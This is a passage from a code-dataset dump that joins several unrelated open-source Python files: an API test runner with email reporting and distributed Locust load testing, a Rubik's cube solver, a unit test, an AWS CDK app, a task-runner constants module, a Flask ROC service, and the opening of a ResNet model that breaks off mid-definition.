testcase_data.testcase_list()\n report_title, report_description = testcase_data.report_info()\n\n @ddt.ddt\n class ApiRun(unittest.TestCase):\n\n @classmethod\n def setUpClass(cls):\n cls.headers = headers\n\n @classmethod\n def tearDownClass(cls):\n pass\n\n @ddt.idata(testcase_list)\n @ddt.unpack\n def test_api(self, title, url, auth, method, query, request_data, expect_status, expect_str):\n print('用例标题:' + title + 'END') # 死活别删这一段,正则匹配这段内容,将标题添加到HTML报告中\n method = method.upper()\n if query:\n query = str_to_json(query)\n if request_data:\n request_body = str_to_json(request_data)\n else:\n request_body = None\n exp_status_code = int(expect_status)\n\n _headers = self.headers\n if str(auth) == '0' or auth == 'FALSE':\n _headers = {\"Content-Type\": \"application/json\"}\n\n if method == 'GET': # GET\n response_actual = requests.get(url=url, headers=_headers, params=query, verify=False)\n elif method == 'POST': # POST\n response_actual = requests.post(url=url, headers=_headers, json=request_body, params=query, verify=False)\n elif method == 'DELETE': # DELETE\n response_actual = requests.delete(url=url, headers=_headers, params=query, verify=False)\n elif method == 'PUT': # PUT\n response_actual = requests.put(url=url, headers=_headers, params=query, json=request_body, verify=False)\n elif method == 'PATCH': # patch\n response_actual = requests.patch(url=url, headers=_headers, params=query, json=request_body, verify=False)\n elif method == 'HEAD':\n response_actual = requests.head(url=url, headers=_headers, params=query, verify=False)\n elif method == 'OPTIONS':\n response_actual = requests.options(url=url, headers=_headers, params=query, verify=False)\n else: # Other method, such as TRACE\n response_actual = requests.request(method=method, url=url, headers=_headers, params=query, json=request_body, verify=False)\n\n actual_status_code = int(response_actual.status_code)\n if actual_status_code == exp_status_code:\n print('Status code is same: {sc}'.format(sc=actual_status_code))\n if expect_str:\n expect_str = expect_str.strip()\n act_response = response_actual.json()\n print('Actual response: {}'.format(act_response))\n if expect_str.endswith(';'):\n expect_str = expect_str.strip(';')\n if expect_str.endswith(';'):\n expect_str = expect_str.strip(';')\n if (';' not in expect_str) and (';' not in expect_str):\n self.assertIn(expect_str, str(act_response), msg='{} is not in response'.format(expect_str))\n else:\n if ';' in expect_str:\n expect_str_list = expect_str.split(';')\n else:\n expect_str_list = expect_str.split(';')\n for each_str in expect_str_list:\n each_str = each_str.strip()\n self.assertIn(each_str, str(act_response), msg='{} is not in response'.format(each_str))\n else:\n try:\n act_response = response_actual.json()\n print('Actual response: {}'.format(act_response))\n except JSONDecodeError:\n act_response = response_actual.text\n print('Not json response: {}'.format(act_response))\n self.fail('Status code is different! Actual code is {}'.format(actual_status_code))\n\n report_filename = testcasefile.replace('\\\\', '-')\n run_test(title=report_title, filename=report_filename, report_path=report_dir, description=report_description,\n testcase=ApiRun)\n\n\ndef pt_slave(ip, username, password, ptfile, ptcommand):\n connect = ConnectSlave(ip, username, password)\n is_locust = connect.check_locust()\n if is_locust:\n dest = '/root/' + ptfile\n connect.trans_file(source=ptfile, dest=dest)\n connect.remote_command(command=ptcommand)\n else:\n logging.error('Slave {} cannot run locust.'.format(ip))\n\n\ndef main():\n parser, options, arguments = parse_options()\n\n # setup logging\n # logger = logging.getLogger(__name__)\n apirun_path = get_apirun_path()\n pwd = os.getcwd()\n _run = False\n _email_mark = False\n\n if options.show_version:\n print(\"Apirun %s\" % (version,))\n sys.exit(0)\n\n if options.make_demo:\n if not apirun_path:\n logger.error('''Cannot locate Python path, make sure it is in right place. If windows add it to sys PATH,\n if linux make sure python is installed in /usr/local/lib/''')\n sys.exit(1)\n demo_path = os.path.join(apirun_path, 'demo', 'demo_testcase.xls')\n new_demo = os.path.join(pwd, 'demo.xls')\n shutil.copyfile(demo_path, new_demo)\n sys.exit(0)\n\n if options.PtDemo:\n if not apirun_path:\n logger.error('''Cannot locate Python path, make sure it is in right place. If windows add it to sys PATH,\n if linux make sure python is installed in /usr/local/lib/''')\n sys.exit(1)\n pt_demo_path = os.path.join(apirun_path, 'demo', 'demo_pressuretest.xls')\n pt_new_demo = os.path.join(pwd, 'PtDemo.xls')\n shutil.copyfile(pt_demo_path, pt_new_demo)\n sys.exit(0)\n\n if options.email:\n global yag, email_to, subject\n _email = []\n if not (options.email_from and options.email_to):\n if not os.path.isfile('email.json'):\n logger.error('It is your first time to use email function, please fill email.json and run it again.')\n demo_email = os.path.join(apirun_path, 'demo', 'email.json')\n new_email = os.path.join(pwd, 'email.json')\n shutil.copyfile(demo_email, new_email)\n sys.exit(0)\n else:\n with open('email.json', 'r') as ef:\n email_info = json.load(ef)\n email_from = email_info['from']\n subject = email_info['subject']\n if subject == '': subject = 'API Test Result'\n receivers = email_info['receiver']\n email_to = []\n for _e in receivers.keys():\n email_to.extend(receivers[_e])\n email_host = email_info['host']\n if options.email_host:\n email_host = options.email_host\n if options.email_from:\n email_from = options.email_from\n if options.email_to:\n _to = options.email_to\n if _to in receivers.keys():\n email_to = receivers[_to]\n else:\n email_to = email_in_cil(_to)\n if options.email_subject:\n subject = options.email_subject\n else:\n email_from = options.email_from\n email_to = options.email_to\n email_host = options.email_host\n if options.email_subject: subject = options.email_subject\n else: subject = 'API Test Result'\n\n _email.append(email_from)\n _email.extend(email_to)\n for _each in _email:\n if check_address(_each): pass\n else:\n logger.error('Email address is not correct: {}'.format(_each))\n sys.exit(1)\n\n yag = init_email(username=email_from, host=email_host)\n _email_mark = True\n\n if options.email_from:\n if not options.email:\n logger.error('Cannot use --from without --email.')\n sys.exit(1)\n\n if options.email_to:\n if not options.email:\n logger.error('Cannot use --to without --email.')\n sys.exit(1)\n\n if options.email_host:\n if not options.email:\n logger.error('Cannot use --host without --email.')\n sys.exit(1)\n\n if options.email_subject:\n if not options.email:\n logger.error('Cannot use --subject without --email.')\n sys.exit(1)\n\n if options.master:\n if not options.PtFile:\n logger.error('Cannot use --master without --pt.')\n sys.exit(1)\n\n if options.report:\n global report_dir\n report_dir = options.report\n if not apirun_path:\n logger.error('''Cannot locate Python path, make sure it is in right place. If windows add it to sys PATH,\n if linux make sure python is installed in /usr/local/lib/''')\n sys.exit(1)\n try:\n os.makedirs(os.path.join(report_dir, 'js'))\n js_file = os.path.join(apirun_path, 'js', 'echarts.common.min.js')\n shutil.copyfile(js_file, os.path.join(report_dir, 'js', 'echarts.common.min.js'))\n except FileExistsError:\n pass\n\n if options.testcasefile:\n if options.testcasefolder:\n logger.error('Cannot use -f and -F together.')\n sys.exit(1)\n testcasefile = options.testcasefile\n if not testcasefile.endswith('.xls'):\n logger.error(\"Testcasefile must be end with '.xls' and see --help for available options.\")\n sys.exit(1)\n if not os.path.isfile(testcasefile):\n logger.error('Testcasefile is not exist, please check it.')\n sys.exit(1)\n\n start_test(testcasefile=testcasefile)\n _run = True\n\n if options.testcasefolder:\n if options.testcasefile:\n logger.error('Cannot use -f and -F together.')\n sys.exit(1)\n testcase_folder = options.testcasefolder\n if testcase_folder:\n if not os.path.isdir(testcase_folder):\n logger.error('Testcasefolder is not exist, please check it.')\n sys.exit(1)\n _dir, _subdir, files = list(os.walk(testcase_folder))[0]\n else:\n _dir, _subdir, files = list(os.walk(os.getcwd()))[0]\n testcase_file_list = []\n for each in files:\n if each.endswith('.xls'):\n testcase_file_list.append(os.path.join(testcase_folder, each))\n if len(testcase_file_list) == 0:\n logger.error('There is no testcase file in Testcasefolder.')\n sys.exit(1)\n for testcasefile in testcase_file_list:\n t = Thread(target=start_test, args=(testcasefile,))\n print(t)\n print('+++++++++++++++ ' + testcasefile)\n t.start()\n t.join()\n _run = True\n\n if options.PtNotRun:\n if options.PtFile:\n logger.error('Cannot use --pt and --pt-not-run together.')\n sys.exit(1)\n pt_file = options.PtNotRun\n if not pt_file.endswith('.xls'):\n logger.error(\"PressureTest file must be end with '.xls' and see --help for available options.\")\n sys.exit(1)\n if not os.path.isfile(pt_file):\n logger.error('PressureTest file is not exist, please check it.')\n sys.exit(1)\n make_locustfile(pt_file)\n logger.info('Generate locustfile success.')\n sys.exit(0)\n\n if options.PtFile:\n if options.PtNotRun:\n logger.error('Cannot use --pt and --pt-not-run together.')\n sys.exit(1)\n pt_file = options.PtFile\n if not pt_file.endswith('.xls'):\n logger.error(\"PressureTest file must be end with '.xls' and see --help for available options.\")\n sys.exit(1)\n if not os.path.isfile(pt_file):\n logger.error('PressureTest file is not exist, please check it.')\n sys.exit(1)\n global _run_pt\n _run_pt = False\n make_locustfile(pt_file)\n ptpy = pt_file.replace('.xls', '.py')\n pt_report = pt_file.strip('.xls')\n if not options.master:\n locust_cli = 'locust -f {locustfile} --csv={ptReport}'.format(locustfile=ptpy, ptReport=pt_report)\n try:\n os.system(locust_cli)\n except KeyboardInterrupt:\n shutil.move(pt_report+'_distribution.csv', os.path.join(report_dir, pt_report+'_distribution.csv'))\n shutil.move(pt_report+'_requests.csv', os.path.join(report_dir, pt_report+'_requests.csv'))\n _run_pt = True\n else:\n pt_s = PtExcel(pt_file)\n master_ip, pt_slave_info = pt_s.pt_slave()\n if master_ip == '':\n logger.error('master IP cannot be None if you use --master')\n sys.exit(1)\n if 'win' in sys.platform.lower():\n locust_cli_master = 'locust -f {locustfile} --csv={ptReport} --master'.format(locustfile=ptpy, ptReport=pt_report)\n else:\n locust_cli_master = 'locust -f {locustfile} --csv={ptReport} --master'.format(locustfile=ptpy, ptReport=pt_report)\n try:\n locust_cli_slave = 'nohup locust -f /root/{locustfile} --slave --master-host={masteIP} > /dev/null 2>&1 &'.format(locustfile=ptpy, masteIP=master_ip)\n for slave in pt_slave_info:\n slave_ip, slave_username, slave_password = slave\n _t = Thread(target=pt_slave, args=(slave_ip, slave_username, slave_password, ptpy, locust_cli_slave))\n logger.info('Prepare slave {}'.format(slave_ip))\n _t.start()\n _t.join()\n os.system(locust_cli_master)\n except KeyboardInterrupt:\n pass\n except Exception as e:\n logger.error('Must someting happend, collect Exceptions here: {}'.format(e))\n finally:\n shutil.move(pt_report + '_distribution.csv', os.path.join(report_dir, pt_report + '_distribution.csv'))\n shutil.move(pt_report + '_requests.csv', os.path.join(report_dir, pt_report + '_requests.csv'))\n _run_pt = True\n\n if _run or _run_pt:\n if _run:\n print('==================')\n results_message = '''\n Results:\n Total: {t}\n Success: {s}\n Failure: {f}\n Error: {e}\n '''.format(t=(_success + _failure + _error), s=_success, f=_failure, e=_error)\n print(results_message)\n else:\n results_message = 'Pressure Test Result.'\n\n if _email_mark:\n attachment = subject.replace(' ', '_') + '.zip'\n zip_report(report_dir, attachment)\n send_email(yag, subject=subject, to=email_to, msg=results_message, attachment=attachment)\n else:\n sys.exit(0)\n sys.exit(0)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"GuoTengda1993/apirun","sub_path":"apirun/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":21278,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"29751732257","text":"#!/usr/bin/env python3\n\n\"\"\"\nSolve any size rubiks cube:\n- For 2x2x2 and 3x3x3 just solve it\n- For 4x4x4 and larger, reduce to 3x3x3 and then solve\n\"\"\"\n\n# standard libraries\nimport argparse\nimport datetime as dt\nimport logging\nimport resource\nimport sys\nfrom math import sqrt\n\n# rubiks cube libraries\nfrom rubikscubennnsolver import SolveError, configure_logging, reverse_steps\n\nif sys.version_info < (3, 6):\n raise SystemError(\"Must be using Python 3.6 or higher\")\n\nconfigure_logging()\nlogger = logging.getLogger(__name__)\n\nlogger.info(\"rubiks-cube-solver.py begin\")\n\nstart_time = dt.datetime.now()\n\nparser = argparse.ArgumentParser()\nparser.add_argument(\"--print-steps\", default=False, action=\"store_true\", help=\"Display animated step-by-step solution\")\nparser.add_argument(\"--debug\", default=False, action=\"store_true\", help=\"set loglevel to DEBUG\")\nparser.add_argument(\"--no-comments\", default=False, action=\"store_true\", help=\"No comments in alg.cubing.net url\")\n\n# CPU mode\nparser.add_argument(\n \"--min-memory\",\n default=False,\n action=\"store_true\",\n help=\"Load smaller tables to use less memory...takes longer to run\",\n)\n\naction = parser.add_mutually_exclusive_group(required=False)\nparser.add_argument(\"--openwith\", default=None, type=str, help=\"Colors for sides U, L, etc\")\nparser.add_argument(\"--colormap\", default=None, type=str, help=\"Colors for sides U, L, etc\")\nparser.add_argument(\"--order\", type=str, default=\"URFDLB\", help=\"order of sides in --state, default kociemba URFDLB\")\nparser.add_argument(\"--solution333\", type=str, default=None, help=\"cube explorer optimal steps for solving 3x3x3\")\nparser.add_argument(\n \"--state\",\n type=str,\n help=\"Cube state\",\n default=\"LBBUUURBDDBBDFLFLUDFBFDDFLLLLRLRFRDUDBULBLFLDLFBLBUDFURURDUUBFFBBRBRLBRFLLDRRDDFRRUURRFDUFBFURUD\",\n)\n\nargs = parser.parse_args()\n\nif \"G\" in args.state:\n args.state = args.state.replace(\"G\", \"F\")\n args.state = args.state.replace(\"Y\", \"D\")\n args.state = args.state.replace(\"O\", \"L\")\n args.state = args.state.replace(\"W\", \"U\")\n\nif args.debug:\n logger.setLevel(logging.DEBUG)\n\nsize = int(sqrt((len(args.state) / 6)))\n\nif size == 2:\n # rubiks cube libraries\n from rubikscubennnsolver.RubiksCube222 import RubiksCube222\n\n cube = RubiksCube222(args.state, args.order, args.colormap)\nelif size == 3:\n # rubiks cube libraries\n from rubikscubennnsolver.RubiksCube333 import RubiksCube333\n\n cube = RubiksCube333(args.state, args.order, args.colormap)\nelif size == 4:\n # rubiks cube libraries\n from rubikscubennnsolver.RubiksCube444 import RubiksCube444\n\n cube = RubiksCube444(args.state, args.order, args.colormap)\nelif size == 5:\n # rubiks cube libraries\n from rubikscubennnsolver.RubiksCube555 import RubiksCube555\n\n cube = RubiksCube555(args.state, args.order, args.colormap)\nelif size == 6:\n # rubiks cube libraries\n from rubikscubennnsolver.RubiksCube666 import RubiksCube666\n\n cube = RubiksCube666(args.state, args.order, args.colormap)\nelif size == 7:\n # rubiks cube libraries\n from rubikscubennnsolver.RubiksCube777 import RubiksCube777\n\n cube = RubiksCube777(args.state, args.order, args.colormap)\nelif size % 2 == 0:\n # rubiks cube libraries\n from rubikscubennnsolver.RubiksCubeNNNEven import RubiksCubeNNNEven\n\n cube = RubiksCubeNNNEven(args.state, args.order, args.colormap)\nelse:\n # rubiks cube libraries\n from rubikscubennnsolver.RubiksCubeNNNOdd import RubiksCubeNNNOdd\n\n cube = RubiksCubeNNNOdd(args.state, args.order, args.colormap)\n\ncube.sanity_check()\ncube.print_cube(\"Initial Cube\")\ncube.www_header()\ncube.www_write_cube(\"Initial Cube\")\n\nif args.openwith:\n for step in args.openwith.split():\n cube.rotate(step)\n cube.print_cube(\"post --openwith\")\n\nif args.solution333:\n solution333 = reverse_steps(args.solution333.split())\nelse:\n solution333 = []\n\ncube.solve(solution333)\nend_time = dt.datetime.now()\ncube.print_cube(\"Final Cube\")\ncube.print_solution(not args.no_comments)\n\nlogger.info(\"*********************************************************************************\")\nlogger.info(\"See /tmp/rubiks-cube-NxNxN-solver/index.html for more detailed solve instructions\")\nlogger.info(\"*********************************************************************************\\n\")\n\n# Now put the cube back in its initial state and verify the solution solves it\nsolution = cube.solution\ncube.re_init()\nlen_steps = len(solution)\n\nfor i, step in enumerate(solution):\n if args.print_steps:\n print((\"Move %d/%d: %s\" % (i + 1, len_steps, step)))\n\n cube.rotate(step)\n\n www_desc = \"Cube After Move %d/%d: %s
\\n\" % (i + 1, len_steps, step)\n cube.www_write_cube(www_desc)\n\n if args.print_steps:\n cube.print_cube(f\"--print-steps {step}\")\n print(\"\\n\\n\\n\\n\")\n\ncube.www_footer()\n\nif args.print_steps:\n cube.print_cube(\"--print-steps DONE\")\n\nif args.min_memory:\n print(\"\\n\\n****************************************\")\n print(\"--min-memory has been replaced by --fast\")\n print(\"****************************************\\n\\n\")\n\nlogger.info(\"rubiks-cube-solver.py end\")\nlogger.info(f\"Memory : {resource.getrusage(resource.RUSAGE_SELF).ru_maxrss:,} bytes\")\nlogger.info(f\"Time : {end_time - start_time}\")\nlogger.info(\"\")\n\nif not cube.solved():\n raise SolveError(\"cube should be solved but is not\")\n","repo_name":"dwalton76/rubiks-cube-NxNxN-solver","sub_path":"rubiks-cube-solver.py","file_name":"rubiks-cube-solver.py","file_ext":"py","file_size_in_byte":5343,"program_lang":"python","lang":"en","doc_type":"code","stars":61,"dataset":"github-code","pt":"53"} +{"seq_id":"5378844626","text":"import os, sys\nsys.path.append(os.path.join(os.path.dirname(__file__), \"../..\"))\nimport unittest\nfrom graph.flower_planting import FlowerPlanting\n\nclass TestFlowerPlanting(unittest.TestCase):\n def setUp(self):\n self.func = FlowerPlanting().gardenNoAdj\n\n def test_1(self):\n N, paths = 3, [[1,2],[2,3],[3,1]]\n expected = [[1,3,2],[1,2,3]]\n self.assertTrue(self.func(N, paths) in expected)\n\n def test_2(self):\n N, paths = 4, [[1,2],[3,4]]\n expected = [[1,2,1,2]]\n self.assertTrue(self.func(N, paths) in expected)\n\n def test_3(self):\n N, paths = 4, [[1,2],[2,3],[3,4],[4,1],[1,3],[2,4]]\n expected = [[1,4,2,3],[1,2,3,4]]\n self.assertTrue(self.func(N, paths) in expected)\n\nif __name__ == '__main__':\n unittest.main()","repo_name":"yokolet/tranquil-beach-python","sub_path":"tranquil-beach/test/graph_test/test_flower_planting.py","file_name":"test_flower_planting.py","file_ext":"py","file_size_in_byte":796,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"26324440852","text":"#!/usr/bin/env python3\nimport os\n\nfrom aws_cdk import App, Aspects, Tags\nfrom cdk_nag import AwsSolutionsChecks\n\nfrom src.AL2_mate_image_builder_pipeline import Al2MateImagebuilderPipeline\nfrom src.s3_ops import S3Ops\nfrom src.Ubuntu_mate_image_builder_pipeline import UbuntuMateImagebuilderPipeline\n\napp = App()\ns3_ops_stack = S3Ops(app, \"S3Ops\")\nal2_mate_image_builder_stack = Al2MateImagebuilderPipeline(\n app,\n \"Al2MateImagebuilderPipeline\",\n env={\n \"account\": os.environ[\"CDK_DEFAULT_ACCOUNT\"],\n \"region\": os.environ[\"CDK_DEFAULT_REGION\"],\n },\n)\n\nubuntu_mate_image_builder_stack = UbuntuMateImagebuilderPipeline(\n app,\n \"UbuntuImagebuilderPipeline\",\n env={\n \"account\": os.environ[\"CDK_DEFAULT_ACCOUNT\"],\n \"region\": os.environ[\"CDK_DEFAULT_REGION\"],\n },\n)\n\nal2_mate_image_builder_stack.add_dependency(s3_ops_stack)\nubuntu_mate_image_builder_stack.add_dependency(s3_ops_stack)\n\nfor tag_key, tag_value in app.node.try_get_context(\"resource_tags\").items():\n Tags.of(app).add(tag_key, tag_value)\n\n\nAspects.of(app).add(AwsSolutionsChecks())\napp.synth()\n","repo_name":"HicResearch/treehoose-ec2-builder","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1107,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"25574108388","text":"# Put this at the top of your kata01.py file \nkata = {\n'Python': 'Guido van Rossum',\n'Ruby': 'Yukihiro Matsumoto',\n'PHP': 'Rasmus Lerdorf'\n}\n\nfor k,v in kata.items():\n print(k, \"was created by\", v)\n\n","repo_name":"Neilus03/42-Python","sub_path":"Modulo_00/ex05/kata01.py","file_name":"kata01.py","file_ext":"py","file_size_in_byte":202,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"17012798721","text":"##-- std imports\nfrom __future__ import annotations\n\n# import datetime\n# import enum\nimport pathlib as pl\nimport types\n# from copy import deepcopy\n# from dataclasses import InitVar, dataclass, field\nfrom typing import (TYPE_CHECKING, Any, Callable, ClassVar, Final, Generic,\n Iterable, Iterator, Mapping, Match, MutableMapping,\n Protocol, Sequence, Tuple, TypeAlias, TypeGuard, TypeVar,\n cast, final, overload, runtime_checkable)\nfrom importlib import resources\n##-- end std imports\n\n##-- plugin names and loaders\nPLUGIN_TOML_PREFIX : Final = \"doot.plugins\" # (project.entry-points.\"doot.plugins\")\nFRONTEND_PLUGIN_TYPES : Final = ['command', 'reporter', 'report-line']\nBACKEND_PLUGIN_TYPES : Final = [\n 'database', 'tracker', 'runner',\n 'command-loader', 'task-loader',\n 'parser', 'action', \"tasker\"\n ]\n\nDEFAULT_COMMAND_LOADER_KEY : Final[str] = \"command-loader\"\n\nDEFAULT_TASK_LOADER_KEY : Final[str] = \"task-loader\"\n\nDEFAULT_PLUGIN_LOADER_KEY : Final[str] = \"plugin-loader\"\n##-- end plugin names and loaders\n\n##-- default plugins\n# Loaded in doot.loaders.plugin_loader\n# as pairs (name, import_path)\n\nDEFAULT_PLUGINS = {}\n\nDEFAULT_PLUGINS['command'] = [(\"help\" , \"doot.cmds.help_cmd:HelpCmd\") ,\n (\"run\" , \"doot.cmds.run_cmd:RunCmd\") ,\n (\"list\" , \"doot.cmds.list_cmd:ListCmd\") ,\n (\"clean\" , \"doot.cmds.clean_cmd:CleanCmd\") ,\n (\"complete\" , \"doot.cmds.complete_cmd:CompleteCmd\") ,\n # (\"serve\" , \"doot.cmds.server_cmd:ServerCmd\") ,\n (\"daemon\" , \"doot.cmds.daemon_cmd:DaemonCmd\") ,\n (\"stub\" , \"doot.cmds.stub_cmd:StubCmd\") ,\n (\"step\" , \"doot.cmds.step_cmd:StepCmd\") ,\n (\"plugins\" , \"doot.cmds.plugins_cmd:PluginsCmd\") ,\n (\"locs\" , \"doot.cmds.locs_cmd:LocsCmd\") ,\n ]\n\nDEFAULT_PLUGINS['reporter'] = [(\"summary\", \"doot.reporters.summary_manager:DootReportManagerSummary\"),\n (\"stack\", \"doot.reporters.stack_manager:DootReportManagerStack\")\n ]\nDEFAULT_PLUGINS['report-line'] = [(\"basic\", \"doot.reporters.basic_reporters:DootAlwaysReport\"),\n (\"time\", \"doot.reporters.basic_reporters:TimerReporter\")\n ]\nDEFAULT_PLUGINS['database'] = []\n\nDEFAULT_PLUGINS['tracker'] = [(\"basic\", \"doot.control.tracker:DootTracker\")]\n\nDEFAULT_PLUGINS['runner'] = [(\"basic\", \"doot.control.runner:DootRunner\")]\n\nDEFAULT_PLUGINS['parser'] = [(\"basic\", \"doot.parsers.parser:DootArgParser\")]\n\nDEFAULT_PLUGINS['action'] = [(\"basic\" , \"doot.actions.base_action:DootBaseAction\"),\n (\"shell\" , \"doot.actions.shell_action:DootShellAction\"),\n ]\n\nDEFAULT_PLUGINS['tasker'] = [(\"tasker\" , \"doot.task.base_tasker:DootTasker\"),\n (\"globber\" , \"doot.task.globber:DootEagerGlobber\"),\n (\"task\" , \"doot.task.base_task:DootTask\"),\n ]\n\n##-- end default plugins\n\n##-- path and file names\nTEMPLATE_PATH : Final[pl.Path] = resources.files(\"doot.__templates\")\nTOML_TEMPLATE : Final[pl.Path] = TEMPLATE_PATH / \"basic_toml\"\nDOOTER_TEMPLATE : Final[pl.Path] = TEMPLATE_PATH / \"dooter\"\n\nDEFAULT_DOOTER : Final[pl.Path] = pl.Path(\"dooter.py\")\n\nDEFAULT_LOAD_TARGETS : Final[list[pl.Path]] = [pl.Path(x) for x in [\"doot.toml\", \"pyproject.toml\", \"Cargo.toml\", \"./.cargo/config.toml\"]]\n\nDEFAULT_STUB_TASK_NAME : Final[str] = \"stub::stub\"\n\n##-- end path and file names\n\nTASK_SEP = \"::\"\nIMPORT_SEP = \":\"\nSUBTASKED_HEAD = \"$head$\"\n\nDEFAULT_CLI_CMD : Final[str] = \"run\"\n\nDEFAULT_TASK_PREFIX : Final[str] = \"task_\"\n\nDEFAULT_TASK_GROUP : Final[str] = \"default\"\n\nANNOUNCE_EXIT : Final[bool] = False\n\nANNOUNCE_VOICE : Final[str] = \"Moira\"\n\nPRINTER_NAME : Final[str] = \"doot._printer\"\n","repo_name":"jgrey4296/doot","sub_path":"doot/constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":4422,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"10219397401","text":"from flask import Flask\nfrom flask_restful import Resource, Api\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.metrics import roc_curve, roc_auc_score\nfrom sklearn.preprocessing import StandardScaler, MinMaxScaler\n\nimport pandas as pd\nimport numpy as np\nimport json\nimport math\n\napp = Flask(__name__)\napi = Api(app)\n\n@app.after_request\ndef after_request(response):\n response.headers.add('Access-Control-Allow-Origin', '*')\n response.headers.add('Access-Control-Allow-Headers', 'Content-Type,Authorization')\n response.headers.add('Access-Control-Allow-Methods', 'GET,PUT,POST,DELETE,OPTIONS')\n return response\n\n@app.route('/', methods=['GET'])\ndef index():\n return 'Hello, World!'\n\n@app.route('/roc//', methods=['GET'])\ndef roc(preprocessing, c):\n df = pd.read_csv('data/transfusion.data')\n xDf = df.loc[:, df.columns != 'Donated']\n y = df['Donated']\n\n # get random numbers to split into train and test\n np.random.seed(1)\n r = np.random.rand(len(df))\n\n # split into train test\n X_train = xDf[r < 0.8]\n X_test = xDf[r >= 0.8]\n y_train = y[r < 0.8]\n y_test = y[r >= 0.8]\n\n #Standardization\n scaler = StandardScaler()\n if preprocessing == \"standard\":\n \tscaler = StandardScaler()\n if preprocessing == \"normalization\":\n scaler = MinMaxScaler()\n X_train = scaler.fit_transform(X_train)\n X_test = scaler.transform(X_test)\n \n #Logistic Regression\n LR = LogisticRegression(C= float(c), random_state=0, solver='lbfgs')\n LR.fit(X_train, y_train)\n probs = LR.predict_proba(X_test)\n fprs, tprs, thresholds = roc_curve(y_test, probs[:,1], pos_label=1)\n score = roc_auc_score(y_test, probs[:,1])\n\n # Return a list of dictionaries\n dicts = []\n for i in range(len(fprs)):\n dicts.append({\"fpr\":round(fprs[i], 4),\"tpr\":round(tprs[i], 4), \"threshold\": thresholds[i], \"score\": round(score, 4)})\n return json.dumps(dicts, indent = 4, sort_keys=True)\n\nif __name__ == '__main__':\n\t# load data\n\tdf = pd.read_csv('data/transfusion.data')\n\txDf = df.loc[:, df.columns != 'Donated']\n\ty = df['Donated']\n\t# get random numbers to split into train and test\n\tnp.random.seed(1)\n\tr = np.random.rand(len(df))\n\t# split into train test\n\tX_train = xDf[r < 0.8]\n\tX_test = xDf[r >= 0.8]\n\ty_train = y[r < 0.8]\n\ty_test = y[r >= 0.8]\n\tapp.run(debug=True)\n","repo_name":"liangvi-cs5500/liangvi-cs5500.github.io","sub_path":"files/visualizing_client_server/flask_roc.py","file_name":"flask_roc.py","file_ext":"py","file_size_in_byte":2353,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"73177628648","text":"n=int(input())\narray=[]\nfor _ in range(n):\n temp=input().split(' ')\n temp1=[]\n for i in temp:\n temp1.append(int(i))\n array.append(temp1)\ncount=0\nfor i in array:\n s=sum(i)\n if s>=2:\n count+=1\nprint(count)","repo_name":"fali007/competetive-coding","sub_path":"team.py","file_name":"team.py","file_ext":"py","file_size_in_byte":235,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"1656748178","text":"import numpy as np\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch\nfrom collections import OrderedDict\n\ndef get_model(name, n_classes, n_time, embedding_dim=128, n_layer=32, channels=1):\n if name == \"resnet\":\n return ResNet(n_classes, n_time, embedding_dim=embedding_dim, n_layer1=n_layer, n_layer2=n_layer, n_layer3=n_layer, n_layer4=n_layer)\n elif name == \"resnet_256\":\n return ResNet(n_classes, n_time, downpool_strides=[(2,1), (2,1), (2,1), (2,1)], embedding_dim=embedding_dim, n_layer1=n_layer, n_layer2=n_layer, n_layer3=n_layer, n_layer4=n_layer, channels=channels)\n elif name == \"resnet_512\":\n return ResNet(n_classes, n_time, downpool_strides=[(2,2), (2,1), (2,1), (2,1)], embedding_dim=embedding_dim, n_layer1=n_layer, n_layer2=n_layer, n_layer3=n_layer, n_layer4=n_layer, channels=channels)\n elif name == \"resnet_1024\":\n return ResNet(n_classes, n_time, downpool_strides=[(2,2), (2,2), (2,1), (2,1)], embedding_dim=embedding_dim, n_layer1=n_layer, n_layer2=n_layer, n_layer3=n_layer, n_layer4=n_layer, channels=channels)\n elif name == \"resnet_2048\":\n return ResNet(n_classes, n_time, downpool_strides=[(2,2), (2,2), (2,2), (2,1)], embedding_dim=embedding_dim, n_layer1=n_layer, n_layer2=n_layer, n_layer3=n_layer, n_layer4=n_layer, channels=channels)\n elif name == \"resnet_4096\":\n return ResNet(n_classes, n_time, downpool_strides=[(2,2), (2,2), (2,2), (2,2)], embedding_dim=embedding_dim, n_layer1=n_layer, n_layer2=n_layer, n_layer3=n_layer, n_layer4=n_layer, channels=channels)\n elif name == \"resnet_8192\":\n return ResNet(n_classes, n_time, downpool_strides=[(2,2), (2,2), (2,2), (2,2)], embedding_dim=embedding_dim, n_layer1=n_layer, n_layer2=n_layer, n_layer3=n_layer, n_layer4=n_layer, channels=channels)\n elif name == \"resnet_16384\":\n return ResNet(n_classes, n_time, downpool_strides=[(2,2), (2,2), (2,2), (2,2)], embedding_dim=embedding_dim, n_layer1=n_layer, n_layer2=n_layer, n_layer3=n_layer, n_layer4=n_layer, channels=channels)\n elif name == \"resnet_big\":\n return ResNet(n_classes, n_time, n_layer1=64, n_layer2=128, n_layer3=256)\n else:\n raise ValueError(\"model with name {} not defined ... \")\n\ndef conv3x3(in_planes, out_planes, stride=1):\n \"\"\"3x3 convolution with padding\"\"\"\n return nn.Conv2d(in_planes, out_planes, kernel_size=3, stride=stride,\n padding=1, bias=False)\n\nclass BasicBlock(nn.Module):\n expansion = 1\n\n def __init__(self, inplanes, planes, stride=1, downsample=None, drop_rate=0.0, drop_block=False, block_size=1):\n super(BasicBlock, self).__init__()\n self.conv1 = conv3x3(inplanes, planes)\n self.bn1 = nn.BatchNorm2d(planes)\n self.relu = nn.LeakyReLU(0.1)\n 